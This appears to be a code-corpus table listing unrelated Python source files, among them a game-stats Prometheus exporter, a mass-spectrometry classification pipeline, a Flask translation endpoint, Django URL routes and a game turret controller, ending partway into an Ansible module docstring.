content stringlengths 5 1.05M |
|---|
class Command(object):
@classmethod
def execute(cls):
pass
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import os
import time
from prometheus_client import Gauge
from prometheus_client import start_http_server
class D2():
""" Division2 class which get user information. """
def __init__(self, url):
self.url = url
def get_user_id(self, uplay_name):
params = (
('name', uplay_name),
('platform', 'uplay'),
)
try:
r = requests.get(
self.url,
params=params
)
except Exception as e:
return False
else:
if 'results' in r.json():
return r.json()['results'][0]['user']
else:
return False
def get_user_info(self, user_id):
params = (
('pid', user_id),
)
try:
r = requests.get(
self.url,
params=params
)
except Exception as e:
return False, False, False, False, False, False, \
False, False, False, False, False, False, \
False, False, False, False, False, False, \
False
else:
timeplayed_total = int(r.json()['timeplayed_total'] / 3600)
timeplayed_dz = int(r.json()['timeplayed_dz'] / 3600)
timeplayed_pve = int(r.json()['timeplayed_pve'] / 3600)
timeplayed_pvp = int(r.json()['timeplayed_pvp'] / 3600)
timeplayed_rogue = int(r.json()['timeplayed_rogue'] / 3600)
level_pve = r.json()['level_pve']
level_dz = r.json()['level_dz']
kills_npc = r.json()['kills_npc']
kills_pvp = r.json()['kills_pvp']
kills_pve_hyenas = r.json()['kills_pve_hyenas']
kills_pve_outcasts = r.json()['kills_pve_outcasts']
kills_pve_blacktusk = r.json()['kills_pve_blacktusk']
kills_pve_truesons = r.json()['kills_pve_truesons']
kills_pve_dz_hyenas = r.json()['kills_pve_dz_hyenas']
kills_pve_dz_outcasts = r.json()['kills_pve_dz_outcasts']
kills_pve_dz_blacktusk = r.json()['kills_pve_dz_blacktusk']
kills_pve_dz_truesons = r.json()['kills_pve_dz_truesons']
kills_headshot = r.json()['kills_headshot']
headshots = r.json()['headshots']
return timeplayed_total, timeplayed_dz, timeplayed_pve, \
timeplayed_pvp, timeplayed_rogue, level_pve, \
level_dz, kills_npc, kills_pvp, kills_pve_hyenas, \
kills_pve_outcasts, kills_pve_blacktusk, \
kills_pve_truesons, kills_pve_dz_hyenas, \
kills_pve_dz_outcasts, kills_pve_dz_blacktusk, \
kills_pve_dz_truesons, kills_headshot, headshots
def main():
users = ['jedipigpig', 'gatchaman.jp', 'lobelia_dixon',
'hayate_ewing', 'souyuh.jp']
vars = ['timeplayed_total', 'timeplayed_dz',
'timeplayed_pve', 'timeplayed_pvp',
'timeplayed_rogue', 'level_pve',
'level_dz', 'kills_npc',
'kills_pvp', 'kills_pve_hyenas',
'kills_pve_outcasts', 'kills_pve_blacktusk',
'kills_pve_truesons', 'kills_pve_dz_hyenas',
'kills_pve_dz_outcasts', 'kills_pve_dz_blacktusk',
'kills_pve_dz_truesons', 'kills_headshot',
'headshots']
dict = {}
for user in users:
for var in vars:
dict[user + '_' + var] = \
Gauge(user.replace('.', '_') + '_' + var, 'Gauge')
start_http_server(8000)
while True:
for user in users:
user_id = D2('https://thedivisiontab.com/api/search.php').get_user_id(user)
value = D2('https://thedivisiontab.com/api/player.php').get_user_info(user_id)
for var in vars:
if user_id:
value_dict = {'timeplayed_total': value[0],
'timeplayed_dz': value[1], 'timeplayed_pve': value[2],
'timeplayed_pvp': value[3], 'timeplayed_rogue': value[4],
'level_pve': value[5], 'level_dz': value[6],
'kills_npc': value[7], 'kills_pvp': value[8],
'kills_pve_hyenas': value[9], 'kills_pve_outcasts': value[10],
'kills_pve_blacktusk': value[11], 'kills_pve_truesons': value[12],
'kills_pve_dz_hyenas': value[13], 'kills_pve_dz_outcasts': value[14],
'kills_pve_dz_blacktusk': value[15], 'kills_pve_dz_truesons': value[16],
'kills_headshot': value[17], 'headshots': value[18]}
dict[user + '_' + var].set(value_dict[var])
time.sleep(60)
if __name__ == "__main__":
main()
|
from common.utils import datetime_to_string
class Verification:
def __init__(self, id, type, entity_id, status, requestee, created_at, updated_at, reject_reason=None):
self.id = id
self.type = type
self.entity_id = entity_id
self.status = status
self.requestee = requestee
self.created_at = created_at
self.updated_at = updated_at
if reject_reason is None:
self.reject_reason = ""
else:
self.reject_reason = reject_reason
def to_response(self):
response_dict = {
"id": self.id,
"type": self.type,
"entity_id": self.entity_id,
"status": self.status,
"requestee": self.requestee,
"reject_reason": self.reject_reason,
"created_at": "",
"updated_at": ""
}
if self.created_at is not None:
response_dict["created_at"] = datetime_to_string(self.created_at)
if self.updated_at is not None:
response_dict["updated_at"] = datetime_to_string(self.updated_at)
return response_dict
|
from profanity_check import predict, predict_prob
from directoryLoader import directoryFileListBuilder
from fileAnalyzer import fileAnalyzer
'''
Dev: Alexander Edward Andrews
Email: alexander.e.andrews.ce@gmail.com
'''
def main():
fileNode = directoryFileListBuilder()
recursiveCaller(fileNode)
def recursiveCaller(fileNode):
for f in fileNode.files:
fileAnalyzer(f)
for n in fileNode.directories:
recursiveCaller(n)
main()
|
#!/usr/bin/env python3
import os
import canopus
import time
from sys import argv
from collections import defaultdict
from typing import List, Dict, Tuple, Union, DefaultDict, Any
def analyse_canopus(sirius_folder: str,
gnps_folder: str,
output_folder: str = './',
class_p_cutoff: float = 0.5,
max_class_depth: Union[float, None] = None,
mf_fraction_cutoff_cf: float = 0.2,
mf_fraction_cutoff_npc: float = 0.2):
"""Wrapper for analysing and combining canopus output with gnps mol network
:param sirius_folder: directory containing sirius/canopus output
:param gnps_folder: directory containing gnps molecular networking output
:param output_folder: directory to write (preliminary) output to
:param class_p_cutoff: cutoff for CF class prediction to be taken into
account
:param max_class_depth: setting to control which CF classes are taken into
account. Setting this to None will use all classes at all levels
(default). Setting to a number will only keep classes at the Xth level.
These classes are then traced back to their parents.
:param mf_fraction_cutoff_cf: fraction cutoff for CF classes to be called
in a componentindex (MF). 0.2 means classes are kept if it occurs in
20% of the spectra
:param mf_fraction_cutoff_npc: fraction cutoff for NPC classes to be called
in a componentindex (MF). 0.2 means classes are kept if it occurs in
20% of the spectra
:return: None
Creates two txt files as output: one for the clusterindices and one for the
componentindices (MFs). Classes for each level are sorted by (our vision
of) most important classes, so taking the first class for a level will be
taking the most important class into account, taking the first two classes
will take the two most important classes into account, etc. For CF classes,
they are sorted by priority (see class_priority.txt), and for NPC classes,
they are sorted by highest score.
"""
# make canopus object
can = canopus.Canopus(sirius_folder, gnps_folder)
# find classes per cluster index (spectra): loop through the nodes in
# molecular network
# class_p_cutoff = 0.5
# it will use all classes (set max_class_depth to a number for only keeping
# the deepest classes at the Xth level)
# max_class_depth = None
hierarchy = ["kingdom", "superclass", "class", "subclass"] + \
[f"level {i}" for i in range(5, 12)]
npc_hierarchy = ['pathway', 'superclass', 'class']
class_results = get_classes_for_mol_network(
can, hierarchy, npc_hierarchy, class_p_cutoff, max_class_depth)
# write cluster index (spectra) results
write_classes_cluster_index(class_results, hierarchy, npc_hierarchy,
output_folder)
# group classes per componentindex (molecular family)
# mf_fraction_cutoff = 0.2
comp_ind_classes = get_classes_for_componentindices(
class_results, can, hierarchy, npc_hierarchy, mf_fraction_cutoff_cf,
mf_fraction_cutoff_npc)
# write componentindex results
comp_ind_results_file = write_classes_componentindex(
comp_ind_classes, hierarchy, npc_hierarchy, output_folder)
def get_classes_for_mol_network(can: canopus.Canopus,
hierarchy: List[str],
npc_hierarchy: List[str],
class_p_cutoff: float,
max_class_depth: Union[int, None]) -> \
DefaultDict[str, List[Union[str, Dict[str, List[Tuple[
Union[str, float]]]]]]]:
"""Loop through mol network and gather CF and NPC classes
:param can: Canopus object of canopus results with gnps mol network data
:param hierarchy: the CF class level names to be included in output in
order of hierarchy
:param npc_hierarchy: the NPC class level names to be included in output in
order of hierarchy
:param class_p_cutoff: probability cutoff for including a class
:param max_class_depth: max class depth for finding CF class
:return: classes output - dict of lists of {componentindex: [cluster index,
formula, {CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]}
CF classes are found by looking for the class at deepest depth (or
max_class_depth) and then ordering these deepest classes based on priority.
Then, the classes are traced back to higher hierarchy and sorted in output,
again based on priority of deepest classes.
"""
results = defaultdict(list)
for node_id, node in can.gnps.nodes.items():
# get canopus compound obj
compound = can.sirius.compounds.get(node_id)
if compound:
cf_classes_dict = get_cf_classes(can, compound, hierarchy,
class_p_cutoff, max_class_depth)
npc_classes_dict = get_npc_classes(can, compound, npc_hierarchy)
formula = compound.formula
comp_id = node.componentId
if comp_id == '-1': # handling of singleton -1 components
comp_id += f"_{node_id}"
results[comp_id].append(
[node_id, formula, cf_classes_dict, npc_classes_dict])
return results
def get_cf_classes(can: canopus.Canopus,
compound: canopus.ontology.Category,
hierarchy: List[str],
class_p_cutoff: float = 0.5,
max_class_depth: Union[int, None] = None
) -> Dict[str, List[Tuple[Any, Any]]]:
"""Get the ClassyFire classes for a compound
:param can: Canopus object of canopus results with gnps mol network data
:param compound: object for the current compound
:param hierarchy: the CF class level names to be included in output in
order of hierarchy
:param class_p_cutoff: probability cutoff for including a class
:param max_class_depth: None for using all classes, set this to a number
for only taking classes into account at a certain max depth
:return: dict with hierarchy as keys and list of tuples as values where
each tuple contains a class (ontology.Category) and its score. List of
classes is sorted on priority
This is kind of an elaboration of assign_most_specific_classes() but here
it finds all classes and orders them on priority, and then it fills the
result lists by starting with the highest priority class and tracing that
class back to all parent classes, then it moves to the second priority
class, etc.
There is also an option to only take into account the class(es) at deepest
depth (or max_class_depth) and then ordering these deepest classes based on
priority, etc. For this max_class_depth needs to be set to a number.
"""
# 1. find all classification trees above 0.5 (dict)
classifications = [c for c in can.sirius.statistics.categoriesFor(
compound, class_p_cutoff)]
# 2.a. take all classifications above cutoff
if not max_class_depth:
deepest_classifications = classifications
deepest_names = set(c.name for c in deepest_classifications)
else:
# 2.b. take deepest classification - find the most specific classes
# classyFireGenus() gives a dict of the class trees
max_tree = max(len(c.classyFireGenus()) for c in classifications)
max_tree = min([max_tree, max_class_depth])
deepest_classifications = [c for c in classifications if
len(c.classyFireGenus()) >= max_tree]
deepest_names = set(c.name for c in deepest_classifications)
# 3. choose the most specific class with top priority
priority_names = [c.name for c in can.sirius.statistics.priority]
chosen_classes_sorted = []
for pr in priority_names: # find deepest with highest priority
if pr in deepest_names:
chosen_class = [c for c in deepest_classifications
if c.name == pr][0]
chosen_classes_sorted.append(chosen_class)
# 4. unpack/trace back all classes to parents even if parents have low prob
classes_dict = defaultdict(list)
classes_set_dict = defaultdict(set)
for c in chosen_classes_sorted:
for h_lvl in hierarchy:
c_h_lvl = c.classyFireGenus().get(h_lvl)
if c_h_lvl:
c_h_set = classes_set_dict[h_lvl]
if c_h_lvl not in c_h_set:
classes_dict[h_lvl].append(c_h_lvl)
c_h_set.add(c_h_lvl)
# 5. get all scores to tuple(cls, sc) and fill empty levels with empty list
classes_dict_sc = {}
for h_lvl in hierarchy:
h_lvl_classes = classes_dict[h_lvl]
h_lvl_result = []
for h_lvl_class in h_lvl_classes:
sc = compound.canopusfp[
can.sirius.statistics.workspace.revmap[h_lvl_class]]
h_lvl_elem = (h_lvl_class, sc)
h_lvl_result.append(h_lvl_elem)
# classes_dict is default dict so _sc will be populated with empty
# list if there are no classes at a certain level
classes_dict_sc[h_lvl] = h_lvl_result
return classes_dict_sc
def get_npc_classes(can: canopus.Canopus,
compound: canopus.ontology.Category,
npc_hierarchy: List[str]):
"""Get NPClassifier classes for a compound
:param can: Canopus object of canopus results with gnps mol network data
:param compound: object for the current compound
:param npc_hierarchy: the CF class level names to be included in output in
order of hierarchy
:return: dict
"""
npc_array = can.npcSummary().loc[compound.name]
npc_dict = {}
for h_lvl in npc_hierarchy:
cls = npc_array[h_lvl]
npc_dict[h_lvl] = [] # init level in dict
if cls != "N/A": # add class if there is one
prob_key = h_lvl + 'Probability'
npc_dict[h_lvl].append((cls, npc_array[prob_key]))
return npc_dict
def write_classes_cluster_index(results: DefaultDict[str, List[
Union[str, Dict[str, List[Tuple[Union[str, float]]]]]]],
hierarchy: List[str],
npc_hierarchy: List[str],
output_folder: str = './'):
"""Write class results for each cluster index to file grouped by components
:param results: dict of lists of {componentindex: [cluster index,
formula, {CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]}
:param hierarchy: the CF class level names to be included in output in
order of hierarchy
:param npc_hierarchy: the NPC class level names to be included in output in
order of hierarchy
:param output_folder: directory to write (preliminary) output to
:return: None
"""
output_file = os.path.join(output_folder,
"cluster_index_classifications.txt")
header = ["componentindex", "cluster index", "formula"] + hierarchy + \
npc_hierarchy
with open(output_file, 'w') as outf:
outf.write("{}\n".format('\t'.join(header)))
# sort on MF/componentindex and then on clusterindex taking care of -1
for comp_ind, clust_ind_results in sorted(
results.items(), key=lambda x: (
int(x[0].split("_")[0]))):
for clust_ind_res in sorted(clust_ind_results,
key=lambda x: int(x[0])):
# turn CF classifications into strings
cf_list = []
cf_res = clust_ind_res[2]
for h in hierarchy:
h_str = []
for cl_tup in cf_res[h]:
h_str.append(f"{cl_tup[0]}:{cl_tup[1]:.3f}")
cf_list.append('; '.join(h_str))
# turn NPC classifications into strings - todo: make subroutine
npc_list = []
npc_res = clust_ind_res[3]
for h in npc_hierarchy:
h_str = []
for cl_tup in npc_res[h]:
h_str.append(f"{cl_tup[0]}:{cl_tup[1]:.3f}")
npc_list.append('; '.join(h_str))
# add everything to a list
res_list = [comp_ind, clust_ind_res[0], clust_ind_res[1]] + \
cf_list + npc_list
res_str = '\t'.join(res_list)
outf.write(f"{res_str}\n")
def get_classes_for_componentindices(clusterindex_results: DefaultDict[
str, List[Union[str, Dict[str, List[Tuple[Union[str, float]]]]]]],
can: canopus.Canopus,
hierarchy: List[str],
npc_hierarchy: List[str],
cf_fraction_cutoff: float = 0.3,
npc_fraction_cutoff: float = 0.2) -> \
List[Tuple[str, int, DefaultDict[Any, list], DefaultDict[Any, list]]]:
"""For each component index in clusterindex_results, gather classes
:param clusterindex_results: classes output - defaultdict of lists of
{componentindex: [cluster index, formula, {CF_level: [(class, prob)]},
{NPC_level: [(class, prob)]}]}
:param can: Canopus object of canopus results with gnps mol network data
:param hierarchy: the CF class level names to be included in output in
order of hierarchy
:param npc_hierarchy: the NPC class level names to be included in output in
order of hierarchy
:param cf_fraction_cutoff: fraction cutoff for CF classes
:param npc_fraction_cutoff: fraction cutoff for NPC classes
:return: list with each tuple element being results for one componentindex
(MF). Each tuple consists of (MF_name, MF_size, CF_results,
NPC_results). Where CF/NPC results are defaultdict with
{hierarchy_lvl: [(class, fraction_score)] }
"""
result_list = []
for comp_ind, cluster_ind_results in clusterindex_results.items():
num_cluster_inds = len(cluster_ind_results)
comp_ind_cf_classes_dict = get_cf_classes_for_componentindex(
cluster_ind_results, num_cluster_inds, can, hierarchy,
cf_fraction_cutoff)
comp_ind_npc_classes_dict = get_npc_classes_for_componentindex(
cluster_ind_results, num_cluster_inds, npc_hierarchy,
npc_fraction_cutoff)
result_list.append((
comp_ind, num_cluster_inds, comp_ind_cf_classes_dict,
comp_ind_npc_classes_dict))
return result_list
def get_cf_classes_for_componentindex(cluster_ind_results: List[
Union[str, Dict[str, List[Tuple[Union[str, float]]]]]],
num_cluster_inds: int,
can: canopus.Canopus,
hierarchy: List[str],
fraction_cutoff: float = 0.3) -> \
DefaultDict[str, List[Tuple[Any]]]:
"""
For one componentindex compute shared CF classes from clusterindex results
:param cluster_ind_results: list of the cluster index results for one
component index(MF) [cluster index, formula,
{CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]
:param num_cluster_inds: size of the MF
:param can: Canopus object of canopus results with gnps mol network data
:param hierarchy: the CF class level names to be included in output in
order of hierarchy
:param fraction_cutoff: fraction cutoff for CF classes
:return: defaultdict with {hierarchy_lvl: [(class, fraction_score)] }
"""
comp_ind_scores = {} # dict{class: fraction_score}
# 1. count the instances of each class in the componentindex (MF)
h_counters = {h: defaultdict(int) for h in hierarchy}
for cluster_ind_res in cluster_ind_results:
ci_classes = cluster_ind_res[2]
for h in hierarchy:
for class_tup in ci_classes[h]:
c_name = class_tup[0]
if c_name:
h_counters[h][c_name] += 1
# 2. calculate fraction and save to dict, irregardless of hierarchy lvl
for h_lvl, h_dict in h_counters.items():
for cls, count in h_dict.items():
if cls:
frac = count / num_cluster_inds
if frac >= fraction_cutoff:
comp_ind_scores[cls] = frac
# 3. order all classes on priority
priority_classes = [c for c in can.sirius.statistics.priority]
comp_ind_sorted_pr = []
for pr in priority_classes: # highest priority
if pr in comp_ind_scores:
comp_ind_sorted_pr.append(pr)
# 4. fill hierarchy based on priority
comp_ind_classes_dict = defaultdict(list)
comp_ind_classes_set_dict = defaultdict(set)
for c in comp_ind_sorted_pr:
for h_lvl in hierarchy:
c_h_lvl = c.classyFireGenus().get(h_lvl)
if c_h_lvl:
c_h_set = comp_ind_classes_set_dict[h_lvl]
# make sure to add a classification only once to lvl
if c_h_lvl not in c_h_set:
comp_ind_sc = comp_ind_scores[c_h_lvl]
comp_ind_classes_dict[h_lvl].append(
(c_h_lvl, comp_ind_sc))
c_h_set.add(c_h_lvl)
return comp_ind_classes_dict
def get_npc_classes_for_componentindex(cluster_ind_results: List[
Union[str, Dict[str, List[Tuple[Union[str, float]]]]]],
num_cluster_inds: int,
npc_hierarchy: List[str],
fraction_cutoff: float = 0.2) -> \
DefaultDict[str, List[Tuple[Any]]]:
"""
For one componentindex compute shared NPC classes from clusterindex results
:param cluster_ind_results: list of the cluster index results for one
component index(MF) [cluster index, formula,
{CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]
:param num_cluster_inds: size of the MF
:param npc_hierarchy: the NPC class level names to be included in output in
order of hierarchy
:param fraction_cutoff: fraction cutoff for NPC classes
:return: defaultdict with {hierarchy_lvl: [(class, fraction_score)] }
"""
# 1. count the instances of each class in the componentindex (MF)
h_counters = {h: defaultdict(int) for h in npc_hierarchy}
for cluster_ind_res in cluster_ind_results:
npc_classes = cluster_ind_res[3]
for h in npc_hierarchy:
for class_tup in npc_classes[h]:
c_name = class_tup[0]
if c_name:
h_counters[h][c_name] += 1
# 2. calculate fraction and add to dict
scores_dict = defaultdict(list)
for h_lvl, h_dict in h_counters.items():
# 3. sort on highest to lowest occurrence (for each level separately)
for cls, count in sorted(h_dict.items(), key=lambda x: x[1],
reverse=True):
if cls:
frac = count / num_cluster_inds
if frac >= fraction_cutoff:
scores_dict[h_lvl].append((cls, frac))
return scores_dict
def write_classes_componentindex(comp_ind_cf_classes: List[
Tuple[str, int, DefaultDict[Any, list], DefaultDict[Any, list]]],
hierarchy: List[str],
npc_hierarchy: List[str],
output_folder: str):
"""
Write component indices class results - component_index_classifications.txt
:param comp_ind_cf_classes:
:param hierarchy: the CF class level names to be included in output in
order of hierarchy
:param npc_hierarchy: the NPC class level names to be included in output in
order of hierarchy
:param output_folder: directory to write (preliminary) output to
:return: path of output file
"""
output_file = os.path.join(output_folder,
"component_index_classifications.txt")
header = ["componentindex", "size"] + hierarchy + \
npc_hierarchy
with open(output_file, 'w') as outf:
outf.write("{}\n".format('\t'.join(header)))
for comp_ind, comp_ind_len, cf_res, npc_res in sorted(
comp_ind_cf_classes, key=lambda x: int(x[0].split("_")[0])):
# turn CF classifications into strings todo: make subroutine
cf_list = []
for h in hierarchy:
h_str = []
for cl_tup in cf_res[h]:
h_str.append(f"{cl_tup[0]}:{cl_tup[1]:.3f}")
cf_list.append('; '.join(h_str))
# turn NPC classifications into strings
npc_list = []
for h in npc_hierarchy:
h_str = []
for cl_tup in npc_res[h]:
h_str.append(f"{cl_tup[0]}:{cl_tup[1]:.3f}")
npc_list.append('; '.join(h_str))
# add everything to a list
res_list = [comp_ind, str(comp_ind_len)] + \
cf_list + npc_list
res_str = '\t'.join(res_list)
outf.write(f"{res_str}\n")
return output_file
if __name__ == "__main__":
start = time.time()
print("Start")
if len(argv) < 3:
raise FileNotFoundError(
"\nUsage: python classification_to_gnps.py " +
"sirius_folder gnps_folder output_folder(default: ./)")
sirius_file = argv[1]
gnps_file = argv[2]
output_dir = './'
if len(argv) == 4:
output_dir = argv[3]
analyse_canopus(sirius_file, gnps_file, output_dir)
end = time.time()
print(f"\nTime elapsed: {end - start:.2f}s")
|
# Importing essential libraries
from flask import Flask, render_template, request
from googletrans import Translator
translator=Translator()
app = Flask(__name__)
@app.route('/predict')
def predict():
message = request.args.get('message')
lang=request.args.get('languages')
lang=lang.lower()
if(lang=="kannada"):
dest_code='kn'
if(lang=="japanese"):
dest_code='ja'
if(lang=="hindi"):
dest_code='hi'
if(lang=="telugu"):
dest_code='te'
if(lang=="tamil"):
dest_code='ta'
if (lang == "afrikaans"):
dest_code = 'af'
if (lang == "albanian"):
dest_code = 'sq'
if (lang == "arabic"):
dest_code = 'ar'
if (lang == "amharic"):
dest_code = 'am'
if (lang == "azerbaijani"):
dest_code = 'az'
if (lang == "bengali"):
dest_code = 'bn'
if (lang == "bulgarian"):
dest_code = 'bg'
if (lang == "catalan"):
dest_code = 'ca'
if (lang == "chichewa"):
dest_code = 'ny'
if (lang == "chinese(simplified)"):
dest_code = 'zh-ch'
if (lang == "chinese(traditional)"):
dest_code = 'zh-tw'
if (lang == "corsican"):
dest_code = 'co'
if (lang == "croatian"):
dest_code = 'hr'
if (lang == "czech"):
dest_code = 'cs'
if (lang == "danish"):
dest_code = 'ta'
if (lang == "dutch"):
dest_code = 'nl'
if (lang == "esperanto"):
dest_code = 'eo'
if (lang == "finnish"):
dest_code = 'fi'
if (lang == "french"):
dest_code = 'fr'
if (lang == "galician"):
dest_code = 'gl'
if (lang == "georgian"):
dest_code = 'ka'
if (lang == "german"):
dest_code = 'de'
if (lang == "greek"):
dest_code = 'el'
if (lang == "gujrati"):
dest_code = 'gu'
if (lang == "hausa"):
dest_code = 'ha'
if (lang == "hawaiin"):
dest_code = 'haw'
if (lang == "hebrew"):
dest_code = 'iw'
if (lang == "hmong"):
dest_code = 'hmn'
if (lang == "indonesian"):
dest_code = 'id'
if (lang == "italian"):
dest_code = 'it'
if (lang == "kannada"):
dest_code = 'kn'
if (lang == "kazakh"):
dest_code = 'kk'
if (lang == "lao"):
dest_code = 'lo'
if (lang == "latin"):
dest_code = 'la'
if (lang == "lithuanian"):
dest_code = 'lt'
if (lang == "luxembourgish"):
dest_code = 'lb'
if (lang == "malagasy"):
dest_code = 'mg'
if (lang == "malayalam"):
dest_code = 'ml'
if (lang == "marathi"):
dest_code = 'mr'
if (lang == "mongolian"):
dest_code = 'mn'
if (lang == "myanmar"):
dest_code = 'my'
if (lang == "nepali"):
dest_code = 'ne'
if (lang == "norwegian"):
dest_code = 'no'
if (lang == "odia"):
dest_code = 'or'
if (lang == "persian"):
dest_code = 'fa'
if (lang == "polish"):
dest_code = 'pl'
if (lang == "portuguese"):
dest_code = 'pt'
if (lang == "punjabi"):
dest_code = 'pa'
if (lang == "romanian"):
dest_code = 'ro'
if (lang == "russian"):
dest_code = 'ru'
if (lang == "serbian"):
dest_code = 'sr'
if (lang == "sindhi"):
dest_code = 'sd'
if (lang == "slovak"):
dest_code = 'sk'
if (lang == "somali"):
dest_code = 'so'
if (lang == "spanish"):
dest_code = 'es'
if (lang == "swahili"):
dest_code = 'sw'
if (lang == "swedish"):
dest_code = 'sv'
if (lang == "thai"):
dest_code = 'th'
if (lang == "turkish"):
dest_code = 'tr'
if (lang == "urdu"):
dest_code = 'ur'
if (lang == "uzbek"):
dest_code = 'uz'
if (lang == "vietnamese"):
dest_code = 'vi'
if (lang == "yiddish"):
dest_code = 'yi'
if (lang == "zulu"):
dest_code = 'zu'
text_to_translate = translator.translate(message, src= 'en', dest= dest_code)
text = text_to_translate.text
return text
if __name__ == '__main__':
app.run(debug=True) |
"""Top-level package for Deployer of AWS Lambdas."""
__author__ = """Sean Lynch"""
__email__ = 'seanl@literati.org'
__version__ = '0.2.1'
|
import math
from controller import Controller
from math_helpers import PolarCoordinate, RelativeObjects, normalise_angle
class TurretController(Controller):
def calc_inputs(self):
if not self.helpers.can_turret_fire():
return self.calc_rotation_velocity(), False
if (
self.will_projectile_hit_rocket_within_bounds()
and self.will_projectile_hit_rocket_before_obstacle()
):
return self.calc_rotation_velocity(), True
return self.calc_rotation_velocity(), False
def calc_rotation_velocity(self):
firing_angle = self.controller_helpers.firing_angle2hit_rocket()
angle2rocket = self.calc_angle2rocket()
if firing_angle is None or abs(firing_angle - angle2rocket) > math.pi / 2:
firing_angle = (
angle2rocket # If firing angle is at > 90 deg, aim for the rocket
)
delta_angle = normalise_angle(firing_angle - self.history.turret.angle)
abs_rotation_speed = min(
self.parameters.turret.max_rotation_speed,
abs(delta_angle) / self.parameters.time.timestep,
) # Take a smaller step if a full move would carry past the rocket
return (1 if delta_angle >= 0 else -1) * abs_rotation_speed
def will_projectile_hit_rocket_within_bounds(self):
safety_buffer = 2.0
projectile_location = self.parameters.turret.location
projectile_speed = self.parameters.turret.projectile_speed
projectile_angle = self.history.turret.angle
projectile_velocity = PolarCoordinate(
projectile_speed, projectile_angle
).pol2cart()
rocket_location = self.history.rocket.location
rocket_velocity = self.physics.calc_rocket_velocity()
projectile2rocket = RelativeObjects(
projectile_location, rocket_location, projectile_velocity, rocket_velocity
)
(
min_dist,
_,
(projectile_location_min_dist, rocket_location_min_dist),
) = projectile2rocket.minimum_distance_between_objects()
return (
min_dist <= self.parameters.rocket.target_radius / safety_buffer
and self.helpers.is_within_bounds(projectile_location_min_dist)
and self.helpers.is_within_bounds(rocket_location_min_dist)
)
def will_projectile_hit_rocket_before_obstacle(self):
projectile_location = self.parameters.turret.location
projectile_speed = self.parameters.turret.projectile_speed
projectile_angle = self.history.turret.angle
projectile_velocity = PolarCoordinate(
projectile_speed, projectile_angle
).pol2cart()
rocket_location = self.history.rocket.location
rocket_velocity = self.physics.calc_rocket_velocity()
projectile2rocket = RelativeObjects(
projectile_location, rocket_location, projectile_velocity, rocket_velocity
)
rocket_output = projectile2rocket.time_objects_first_within_distance(
self.parameters.rocket.target_radius
)
if rocket_output is None:
return False # Doesn't hit rocket at all
time_rocket_intercept, _ = rocket_output
for obstacle in self.parameters.environment.obstacles:
projectile2obstacle = RelativeObjects(
projectile_location, obstacle.location, projectile_velocity
)
obstacle_output = projectile2obstacle.time_objects_first_within_distance(
obstacle.radius
)
if obstacle_output is None:
continue
time_obstacle_intercept, _ = obstacle_output
if time_obstacle_intercept < time_rocket_intercept:
return False
return True
def calc_angle2rocket(self):
return math.atan2(
*(
list(self.history.rocket.location - self.parameters.turret.location)[
::-1
]
)
)
|
from src.run import hello_world
def test_hello():
assert hello_world() == "Hello world!"
|
from setuptools import setup
from setuptools import find_packages
long_description = '''
Implementation of a sharable vector-like structure.
'''
setup(name='PyVector',
version='0.0.1',
description='',
long_description=long_description,
author='Frédéric Branchaud-Charron',
author_email='frederic.branchaud.charron@gmail.com',
url='https://github.com/Dref360/pyvector-shared',
license='MIT',
install_requires=['numpy>=1.9.1'],
extras_require={
'tests': ['pytest',
'pytest-pep8',
'pytest-xdist'],
},
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules'
],
packages=find_packages())
|
from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from modem_api import views
urlpatterns = [
path('modems/', views.ModemList.as_view(), name='modem-list'),
path('modems/<int:pk>/', views.ModemDetail.as_view(), name='modem-detail'),
path('stations/', views.StationList.as_view(), name='station-list'),
path('stations/<int:pk>/', views.StationDetail.as_view(), name='station-detail'),
path('service_stations/', views.ServiceStationList.as_view(), name='service-station-list'),
path('service_stations/<int:pk>/', views.ServiceStationDetail.as_view(), name='service-station-detail'),
path('users/', views.UserList.as_view(), name='user-list'),
path('users/<int:pk>/', views.UserDetail.as_view(), name='user-detail'),
]
urlpatterns = format_suffix_patterns(urlpatterns)
|
import pandas as pd
import matplotlib.pyplot as plt
#reading data
stock_price = pd.read_csv('datasets/intel.csv', parse_dates=True, index_col='Date')
#reviewing the data
# print(stock_price)
stock_price.loc['2017-10-16':'2017-10-20', ['Open', 'Close']].plot(style='.-', title='Intel Stock Price', subplots=True)
plt.ylabel('Closing Price')
plt.show() |
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from . import views
urlpatterns = [
path('', views.editor, name='editor'),
path('<int:index>', views.editor, name='editor'),
path('rename_segment/<int:index>/<str:new_name>', views.rename_segment,
name='rename_segment'),
path('remove_segment/<int:index>', views.remove_segment, name='remove_segment'),
path('get_segment/<int:index>', views.get_segment, name='get_segment'),
path('get_track', views.get_track, name='get_track'),
path('get_summary', views.get_summary, name='get_summary'),
path('save_session', views.save_session, name='save_session'),
path('remove_session/<int:index>', views.remove_session, name='remove_session'),
path('rename_session/<str:new_name>', views.rename_session, name='rename_session'),
path('download_session', views.download_session, name='download_session'),
path('get_segments_links', views.get_segments_links, name='get_segments_links'),
path('reverse_segment/<int:index>', views.reverse_segment, name='reverse_segment'),
path('change_segments_order', views.change_segments_order, name='change_segments_order'),
path('divide_segment/<int:index>/<int:div_index>', views.divide_segment, name='divide_segment'),
# path('hello/<int:var>', views.hello, name='hello'),
]
# DEBUG will only be available during development in other case a more powerful
# server, like nginx, would be use
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: ucs_storage_profile
short_description: Configures storage profiles on Cisco UCS Manager
description:
- Configures storage profiles on Cisco UCS Manager.
- Examples can be used with the L(UCS Platform Emulator,https://communities.cisco.com/ucspe).
extends_documentation_fragment: ucs
options:
state:
description:
